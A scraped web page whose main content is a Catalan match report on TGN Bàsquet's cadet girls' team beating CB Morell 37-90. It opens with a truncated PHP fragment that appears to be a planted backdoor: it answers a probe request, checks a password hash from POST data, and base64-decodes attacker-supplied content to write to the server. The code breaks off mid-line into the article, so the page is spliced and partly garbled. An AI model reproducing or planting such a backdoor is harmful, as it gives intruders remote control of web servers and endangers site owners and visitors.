function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Tercera victòria consecutiva! -

Tercera victòria consecutiva!

Updated: octubre 24, 2022

Tercer partit de la temporada del Cadet femení 08C, segon duel com a visitant, i tercer triomf consecutiu contra el CB Morell (37-90). L’equip va demostrar tot el seu potencial ofensiu i defensiu. El matx va ser un monòleg lila de la seva solidesa defensiva. La defensa era molt solidària, amb constants ajudes, cap badada, cap cistella fàcil. En l’apartat ofensiu el conjunt lila, va estar molt encertat anotant 90 punts. Així doncs,  l’equip local no va tenir cap opció de victòria contra un rival més intens en tots els aspectes del joc.

Les tarragonines no van voler sorpreses i van assegurar-se la primera plaça a la classificació, A mesura que passaven els minuts, la superioritat del TGN Bàsquet va ser més gran, el CB Morell no reaccionava i al final del tercer quart el resultat era superior. Finalment, el TGN Bàsquet li va permetre jugar sense pressió i provar situacions noves de joc.